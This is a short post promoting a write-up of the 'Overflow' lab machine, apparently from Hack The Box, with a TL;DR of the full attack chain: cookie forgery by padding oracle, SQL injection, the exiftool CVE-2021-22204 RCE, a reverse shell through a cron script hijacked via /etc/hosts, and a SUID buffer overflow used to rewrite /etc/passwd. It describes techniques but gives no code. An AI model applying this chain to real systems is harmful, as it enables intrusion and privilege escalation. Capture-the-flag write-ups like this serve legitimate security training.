Read my writeup for Overflow machine:
TL;DR
User 1: Found padding-oracle on auth Cookie token, Using that we create auth token of the admin user, Found SQLi on logs API, Using SQLi we fetch the editor password of CMS Made Simple system, On CMS we found another subdomain devbuild-job.overflow.htb, On this subdomain, we found upload page, the webserver validate the image using exiftool, Using CVE-2021-22204-exiftool we get RCE as www-data user, On /var/www/html/config/db.php we found the password of developer user.
User 2: By enumerating we found a file on /opt/commontask.sh which runs every 1 min by tester user, This script trying to download file task.sh from http://taskmanage.overflow.htb, By observing the permission of the file /etc/passwd we can see developer user can edit /etc/hosts, Using that we add taskmanage.overflow.htb subdomain, With the user www-data we create a reverse shell on /var/www/html/task.sh and we get a reverse shell as tester user.
Root: Found SUID file /opt/file_encrypt/file_encrypt which encrypts (using XOR) input file and writes it to the target path as root, By reversing the binary we found a Buffer Overflow, Using that we change the return address from check_pin function to encrypt function, By encrypting our /etc/passwd file (which replace the group of developer user to root) to /etc/passwd we log in with developer as root.